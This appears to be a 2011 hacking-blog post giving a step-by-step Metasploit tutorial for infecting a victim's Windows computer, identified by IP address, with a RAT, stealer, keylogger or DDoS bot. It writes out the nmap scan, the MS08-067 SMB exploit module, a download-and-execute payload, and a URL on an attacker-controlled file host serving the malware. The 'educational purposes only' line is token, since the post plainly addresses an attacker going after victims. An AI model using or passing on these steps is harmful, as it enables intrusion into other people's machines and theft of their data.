Monday, October 3, 2011

Infecting Ip using Metasploit



Using this Tutorial You can put your RAT,STEALER,KEYLOGGER or DDOSER using IP and this tutorial.

THIS TUTORIAL IS WRITTEN IN EDUCATIONAL PURPOSES ONLY!!

WE NEED:
1. Nmap
2. Metasploit 

1. First we need to find victms IP. 
You can Follow my TUTORIAL which i posted earlier

2. Now we need to create database.
We open metasploit and type 'db_create' (this will create database)
If you created database before, than its enough to type 'db_connect' ...

3. Now we scan victms IP
So in metasploit type 'Nmap'

Next command is 'nmap -sT -sV <target ip>' (in '' we type victms IP without '<>')
When scanning is done, we will have detailed description victms computer...

If we get something like this Windows 2000 (all versions XP SP1, SP2, SP3, SP4) We can without problem do the attack..
4. Exploit

In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)

Now type 'set target 0'
Than type 'show payloads
Than 'set payload / download_exec'

Than type 'Show options'
You will se enough of options, fill only RHOST i URL. 

Type: set RHOST <target IP>

Than type 'set URL http://www.site.com/xxx.exe' ('http://www.site.com/ -should be your site , a 'xxx.exe' is name of your RAT, stiler, virus what is uploaded on your site)
(http://www.fileave.com , http://www.zymic.com)
AT the end we type 'exploit'

1 comments:

  • December 9, 2016 at 1:45 AM
    Blogger says:

    I have been using Kaspersky protection for a few years now, and I would recommend this Anti virus to everyone.

    delete

Post a Comment

Related Posts Plugin for WordPress, Blogger...

Popular posts

 

Computer Hack World Copyright © 2011 -- Template created by O Pregador -- Powered by Blogger